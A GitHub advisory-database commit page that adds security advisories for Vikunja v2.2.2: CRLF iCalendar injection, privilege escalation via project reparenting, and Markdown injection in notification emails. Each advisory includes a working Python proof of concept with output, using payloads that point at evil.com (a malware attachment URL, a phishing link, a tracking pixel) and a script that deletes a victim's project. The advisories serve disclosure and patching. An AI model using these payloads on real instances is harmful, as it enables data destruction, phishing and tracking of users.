Skip to content

Commit a1d51df

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-2g7h-7rqr-9p4r GHSA-2vq4-854f-5c72 GHSA-45q4-x4r9-8fqj GHSA-479c-33wc-g2pg GHSA-48ch-p4gq-x46x GHSA-f984-pcp8-v2p7 GHSA-fgfv-pv97-6cmj GHSA-hj5c-mhh2-g7jq GHSA-hr2v-4r36-88hr GHSA-mj24-pqx2-6788 GHSA-p8c7-hjc4-gwf8 GHSA-q4gf-8mx6-v5v3 GHSA-q5jf-9vfq-h4h7 GHSA-qh78-rvg3-cv54 GHSA-r4fg-73rc-hhh7 GHSA-v457-wxvj-p9w9 GHSA-v479-vf79-mg83 GHSA-vmx8-mqv2-9gmg GHSA-w799-7525-rpr6
1 parent 5f4a2d4 commit a1d51df

19 files changed

Lines changed: 1431 additions & 17 deletions

File tree

advisories/github-reviewed/2026/04/GHSA-2g7h-7rqr-9p4r/GHSA-2g7h-7rqr-9p4r.json

Lines changed: 68 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,68 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-2g7h-7rqr-9p4r",
4+
"modified": "2026-04-10T15:35:05Z",
5+
"published": "2026-04-10T15:35:05Z",
6+
"aliases": [
7+
"CVE-2026-35601"
8+
],
9+
"summary": "Vikunja has iCalendar Property Injection via CRLF in CalDAV Task Output",
10+
"details": "## Summary\n\nThe CalDAV output generator builds iCalendar VTODO entries via raw string concatenation without applying RFC 5545 TEXT value escaping. User-controlled task titles containing CRLF characters break the iCalendar property boundary, allowing injection of arbitrary iCalendar properties such as `ATTACH`, `VALARM`, or `ORGANIZER`.\n\n## Details\n\nThe `ParseTodos` function at `pkg/caldav/caldav.go:146` concatenates the task summary directly into the iCalendar output:\n\n```go\nSUMMARY:` + t.Summary + getCaldavColor(t.Color)\n```\n\nRFC 5545 Section 3.3.11 requires TEXT property values to escape newlines as `\\n`, semicolons as `\\;`, commas as `\\,`, and backslashes as `\\\\`. None of these escaping rules are applied to `Summary`, `Categories`, `UID`, project name, or alarm `Description` fields.\n\nGo's JSON decoder preserves literal CR/LF bytes in string values, so task titles created via the REST API retain CRLF characters. When these tasks are served via CalDAV, the newlines break the `SUMMARY` property and the subsequent text is parsed by CalDAV clients as independent iCalendar properties.\n\n## Proof of Concept\n\nTested on Vikunja v2.2.2.\n\n```python\nimport requests\nfrom requests.auth import HTTPBasicAuth\n\nTARGET = \"http://localhost:3456\"\nAPI = f\"{TARGET}/api/v1\"\n\ntoken = requests.post(f\"{API}/login\",\n json={\"username\": \"alice\", \"password\": \"Alice1234!\"}).json()[\"token\"]\nh = {\"Authorization\": f\"Bearer {token}\", \"Content-Type\": \"application/json\"}\n\nproj = requests.put(f\"{API}/projects\", headers=h, json={\"title\": \"CalDAV Test\"}).json()\n\n# create task with CRLF injection in title\ntask = requests.put(f\"{API}/projects/{proj['id']}/tasks\", headers=h, json={\n \"title\": \"Meeting\\r\\nATTACH:https://evil.com/malware.exe\\r\\nX-INJECTED:pwned\"\n}).json()\n\n# set UID (normally done by CalDAV sync; here via sqlite for PoC)\n# sqlite3 vikunja.db \"UPDATE tasks SET uid='inject-test-001' WHERE id={task['id']};\"\nTASK_UID = \"inject-test-001\"\n\n# fetch via CalDAV\ncaldav_token = requests.put(f\"{API}/user/settings/token/caldav\", headers=h).json()[\"token\"]\nr = requests.get(f\"{TARGET}/dav/projects/{proj['id']}/{TASK_UID}.ics\",\n auth=HTTPBasicAuth(\"alice\", caldav_token))\nprint(r.text)\n```\n\nOutput:\n```\nBEGIN:VCALENDAR\nVERSION:2.0\nBEGIN:VTODO\nUID:inject-test-001\nDTSTAMP:20260327T130452Z\nSUMMARY:Meeting\nATTACH:https://evil.com/malware.exe\nX-INJECTED:pwned\nCREATED:20260327T130452Z\nLAST-MODIFIED:20260327T130452Z\nEND:VTODO\nEND:VCALENDAR\n```\n\nThe `ATTACH` and `X-INJECTED` lines appear as separate, valid iCalendar properties. CalDAV clients will parse these as legitimate properties.\n\n## Impact\n\nAn authenticated user with write access to a shared project can create tasks with CRLF-injected titles via the REST API. When other users sync via CalDAV, the injected properties take effect in their calendar clients. This enables:\n- Injecting malicious attachment URLs (`ATTACH`) that clients may auto-download or display\n- Creating fake alarm notifications (`VALARM`) for social engineering\n- Spoofing organizer identity (`ORGANIZER`)\n\n## Recommended Fix\n\nApply RFC 5545 TEXT value escaping to all user-controlled fields:\n\n```go\nfunc escapeICal(s string) string {\n s = strings.ReplaceAll(s, \"\\\\\", \"\\\\\\\\\")\n s = strings.ReplaceAll(s, \";\", \"\\\\;\")\n s = strings.ReplaceAll(s, \",\", \"\\\\,\")\n s = strings.ReplaceAll(s, \"\\n\", \"\\\\n\")\n s = strings.ReplaceAll(s, \"\\r\", \"\")\n return s\n}\n```\n\nApply `escapeICal()` to `t.Summary`, `config.Name`, `t.Categories` items, `a.Description`, `t.UID`, and `r.UID`.\n\n---\n*Found and reported by [aisafe.io](https://aisafe.io)*",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "code.vikunja.io/api"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.3.0"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 2.2.2"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-2g7h-7rqr-9p4r"
45+
},
46+
{
47+
"type": "WEB",
48+
"url": "https://github.com/go-vikunja/vikunja/pull/2580"
49+
},
50+
{
51+
"type": "PACKAGE",
52+
"url": "https://github.com/go-vikunja/vikunja"
53+
},
54+
{
55+
"type": "WEB",
56+
"url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0"
57+
}
58+
],
59+
"database_specific": {
60+
"cwe_ids": [
61+
"CWE-93"
62+
],
63+
"severity": "MODERATE",
64+
"github_reviewed": true,
65+
"github_reviewed_at": "2026-04-10T15:35:05Z",
66+
"nvd_published_at": null
67+
}
68+
}

advisories/github-reviewed/2026/04/GHSA-2vq4-854f-5c72/GHSA-2vq4-854f-5c72.json

Lines changed: 72 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,72 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-2vq4-854f-5c72",
4+
"modified": "2026-04-10T15:33:50Z",
5+
"published": "2026-04-10T15:33:50Z",
6+
"aliases": [
7+
"CVE-2026-35595"
8+
],
9+
"summary": "Vikunja vulnerable to Privilege Escalation via Project Reparenting",
10+
"details": "## Summary\n\nA user with Write-level access to a project can escalate their permissions to Admin by moving the project under a project they own. After reparenting, the recursive permission CTE resolves ownership of the new parent as Admin on the moved project. The attacker can then delete the project, manage shares, and remove other users' access.\n\n## Details\n\nThe `CanUpdate` check at `pkg/models/project_permissions.go:139-148` only requires `CanWrite` on the new parent project when changing `parent_project_id`. However, Vikunja's permission model uses a recursive CTE that walks up the project hierarchy to compute permissions. Moving a project under a different parent changes the permission inheritance chain.\n\nWhen a user has inherited Write access (from a parent project share) and reparents the child project under their own project tree, the CTE resolves their ownership of the new parent as Admin (permission level 2) on the moved project.\n\n```go\nif p.ParentProjectID != 0 && p.ParentProjectID != ol.ParentProjectID {\n newProject := &Project{ID: p.ParentProjectID}\n can, err := newProject.CanWrite(s, a) // Only checks Write, not Admin\n if err != nil {\n return false, err\n }\n if !can {\n return false, ErrGenericForbidden{}\n }\n}\n```\n\n## Proof of Concept\n\nTested on Vikunja v2.2.2.\n\n```\n1. victim creates \"Parent Project\" (id=3)\n2. victim creates \"Secret Child\" (id=4) under Parent Project\n3. victim shares Parent Project with attacker at Write level (permission=1)\n -> attacker inherits Write on Secret Child (no direct share)\n4. attacker creates own \"Attacker Root\" project (id=5)\n5. attacker verifies: DELETE /api/v1/projects/4 -> 403 Forbidden\n6. attacker sends: POST /api/v1/projects/4 {\"title\":\"Secret Child\",\"parent_project_id\":5}\n -> 200 OK (reparenting succeeds, only requires Write)\n7. attacker sends: DELETE /api/v1/projects/4 -> 200 OK\n -> Project deleted. victim gets 404.\n```\n\n```python \nimport requests \n \nTARGET = \"http://localhost:3456\" \nAPI = f\"{TARGET}/api/v1\" \n \ndef login(u, p): \n return requests.post(f\"{API}/login\", json={\"username\": u, \"password\": p}).json()[\"token\"]\n \ndef h(token): \n return {\"Authorization\": f\"Bearer {token}\", \"Content-Type\": \"application/json\"}\n \nvictim_token = login(\"victim\", \"Victim123!\")\nattacker_token = login(\"attacker\", \"Attacker123!\") \n \n# victim creates parent -> child project hierarchy \nparent = requests.put(f\"{API}/projects\", headers=h(victim_token),\n json={\"title\": \"Parent Project\"}).json()\nchild = requests.put(f\"{API}/projects\", headers=h(victim_token),\n json={\"title\": \"Secret Child\", \"parent_project_id\": parent[\"id\"]}).json()\n\n# victim shares parent with attacker at Write (attacker inherits Write on child)\nrequests.put(f\"{API}/projects/{parent['id']}/users\", headers=h(victim_token),\n json={\"username\": \"attacker\", \"permission\": 1})\n\n# attacker creates own root project\nown = requests.put(f\"{API}/projects\", headers=h(attacker_token),\n json={\"title\": \"Attacker Root\"}).json()\n\n# before: attacker cannot delete child\nr = requests.delete(f\"{API}/projects/{child['id']}\", headers=h(attacker_token))\nprint(f\"DELETE before reparent: {r.status_code}\") # 403\n\n# exploit: reparent child under attacker's project\nr = requests.post(f\"{API}/projects/{child['id']}\", headers=h(attacker_token),\n json={\"title\": \"Secret Child\", \"parent_project_id\": own[\"id\"]})\nprint(f\"Reparent: {r.status_code}\") # 200\n\n# after: attacker can now delete child\nr = requests.delete(f\"{API}/projects/{child['id']}\", headers=h(attacker_token))\nprint(f\"DELETE after reparent: {r.status_code}\") # 200 - escalated to Admin\n\n# victim lost access\nr = requests.get(f\"{API}/projects/{child['id']}\", headers=h(victim_token))\nprint(f\"Victim access: {r.status_code}\") # 404 - project gone\n```\n\nOutput:\n```\nDELETE before reparent: 403\nReparent: 200\nDELETE after reparent: 200\nVictim access: 404\n```\n\nThe attacker escalated from inherited Write to Admin by reparenting, then deleted the victim's project.\n\n## Impact\n\nAny user with Write permission on a shared project can escalate to full Admin by moving the project under their own project tree via a single API call. After escalation, the attacker can delete the project (destroying all tasks, attachments, and history), remove other users' access, and manage sharing settings. This affects any project where Write access has been shared with collaborators.\n\n## Recommended Fix\n\nRequire Admin permission instead of Write when changing `parent_project_id`:\n\n```go\nif p.ParentProjectID != 0 && p.ParentProjectID != ol.ParentProjectID {\n newProject := &Project{ID: p.ParentProjectID}\n can, err := newProject.IsAdmin(s, a)\n if err != nil {\n return false, err\n }\n if !can {\n return false, ErrGenericForbidden{}\n }\n canAdmin, err := p.IsAdmin(s, a)\n if err != nil {\n return false, err\n }\n if !canAdmin {\n return false, ErrGenericForbidden{}\n }\n}\n```\n\n---\n*Found and reported by [aisafe.io](https://aisafe.io)*",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "code.vikunja.io/api"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.3.0"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 2.2.2"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-2vq4-854f-5c72"
45+
},
46+
{
47+
"type": "WEB",
48+
"url": "https://github.com/go-vikunja/vikunja/pull/2583"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://github.com/go-vikunja/vikunja/commit/c03d682f48aff890eeb3c8b41d38226069722827"
53+
},
54+
{
55+
"type": "PACKAGE",
56+
"url": "https://github.com/go-vikunja/vikunja"
57+
},
58+
{
59+
"type": "WEB",
60+
"url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0"
61+
}
62+
],
63+
"database_specific": {
64+
"cwe_ids": [
65+
"CWE-269"
66+
],
67+
"severity": "HIGH",
68+
"github_reviewed": true,
69+
"github_reviewed_at": "2026-04-10T15:33:50Z",
70+
"nvd_published_at": null
71+
}
72+
}

advisories/github-reviewed/2026/04/GHSA-45q4-x4r9-8fqj/GHSA-45q4-x4r9-8fqj.json

Lines changed: 72 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,72 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-45q4-x4r9-8fqj",
4+
"modified": "2026-04-10T15:34:53Z",
5+
"published": "2026-04-10T15:34:53Z",
6+
"aliases": [
7+
"CVE-2026-35600"
8+
],
9+
"summary": "Vikunja has HTML Injection via Task Titles in Overdue Email Notifications",
10+
"details": "## Summary\n\nTask titles are embedded directly into Markdown link syntax in overdue email notifications without escaping Markdown special characters. When rendered by goldmark and sanitized by bluemonday (which allows `<a>` and `<img>` tags), injected Markdown constructs produce phishing links and tracking pixels in legitimate notification emails.\n\n## Details\n\nThe overdue task notification at `pkg/models/notifications.go:360` constructs a Markdown list entry:\n\n```go\noverdueLine += `* [` + task.Title + `](` + config.ServicePublicURL.GetString() + \"tasks/\" + strconv.FormatInt(task.ID, 10) + `) ...`\n```\n\nThe task title is placed inside Markdown link syntax `[TITLE](URL)`. A title containing `]` and `[` breaks the link structure. The assembled Markdown is converted to HTML by goldmark at `pkg/notifications/mail_render.go:214`, then sanitized by bluemonday's UGCPolicy. Since UGCPolicy intentionally allows `<a href>` and `<img src>` with http/https URLs, the injected links and images survive sanitization and reach the email recipient.\n\nThe same pattern affects multiple notification types at `notifications.go` lines 72, 176, 227, and 318.\n\n## Proof of Concept\n\nTested on Vikunja v2.2.2 with SMTP enabled (MailHog as sink).\n\n```python\nimport requests\n\nTARGET = \"http://localhost:3456\"\nAPI = f\"{TARGET}/api/v1\"\n\ntoken = requests.post(f\"{API}/login\",\n json={\"username\": \"alice\", \"password\": \"Alice1234!\"}).json()[\"token\"]\nh = {\"Authorization\": f\"Bearer {token}\", \"Content-Type\": \"application/json\"}\n\nproj = requests.put(f\"{API}/projects\", headers=h, json={\"title\": \"Shared\"}).json()\n\n# create task with markdown injection in title + past due date\nrequests.put(f\"{API}/projects/{proj['id']}/tasks\", headers=h, json={\n \"title\": 'test](https://evil.com) [Click to verify your account',\n \"due_date\": \"2026-03-26T00:00:00Z\"})\n\n# create task with tracking pixel injection\nrequests.put(f\"{API}/projects/{proj['id']}/tasks\", headers=h, json={\n \"title\": '![](https://evil.com/track.png?user=bob)',\n \"due_date\": \"2026-03-26T00:00:00Z\"})\n\n# enable overdue reminders for the user\nrequests.post(f\"{API}/user/settings/general\", headers=h, json={\n \"email_reminders_enabled\": True,\n \"overdue_tasks_reminders_enabled\": True,\n \"overdue_tasks_reminders_time\": \"09:00\"})\n\n# wait for the overdue notification cron to fire, then inspect the email\n```\n\nThe overdue notification email HTML contains:\n```html\n<li>\n <a href=\"https://evil.com\">test</a>\n <a href=\"http://vikunja.example/tasks/5\">Click to verify your account</a>\n (Shared), since one day\n</li>\n<li>\n <a href=\"http://vikunja.example/tasks/6\">\n <img src=\"https://evil.com/track.png?user=bob\">\n </a>\n (Shared), since one day\n</li>\n```\n\nThe attacker's `evil.com` link appears as a clickable link in a legitimate Vikunja notification email. The tracking pixel loads when the email is opened.\n\n## Impact\n\nAn attacker with write access to a shared project can craft task titles that inject phishing links or tracking images into overdue email notifications sent to other project members. Because these links appear within legitimate Vikunja notification emails from the configured SMTP server, recipients are more likely to trust and click them.\n\n## Recommended Fix\n\nEscape Markdown special characters in task titles before embedding them in Markdown content:\n\n```go\nfunc escapeMarkdown(s string) string {\n replacer := strings.NewReplacer(\n \"[\", \"\\\\[\", \"]\", \"\\\\]\",\n \"(\", \"\\\\(\", \")\", \"\\\\)\",\n \"!\", \"\\\\!\", \"`\", \"\\\\`\",\n \"*\", \"\\\\*\", \"_\", \"\\\\_\",\n \"#\", \"\\\\#\",\n )\n return replacer.Replace(s)\n}\n```\n\n---\n*Found and reported by [aisafe.io](https://aisafe.io)*",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "code.vikunja.io/api"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.3.0"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 2.2.2"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-45q4-x4r9-8fqj"
45+
},
46+
{
47+
"type": "WEB",
48+
"url": "https://github.com/go-vikunja/vikunja/pull/2580"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://github.com/go-vikunja/vikunja/commit/0f3730d045f20e261e3cdfc6d93c325653395b64"
53+
},
54+
{
55+
"type": "PACKAGE",
56+
"url": "https://github.com/go-vikunja/vikunja"
57+
},
58+
{
59+
"type": "WEB",
60+
"url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0"
61+
}
62+
],
63+
"database_specific": {
64+
"cwe_ids": [
65+
"CWE-79"
66+
],
67+
"severity": "MODERATE",
68+
"github_reviewed": true,
69+
"github_reviewed_at": "2026-04-10T15:34:53Z",
70+
"nvd_published_at": null
71+
}
72+
}

0 commit comments

Comments
 (0)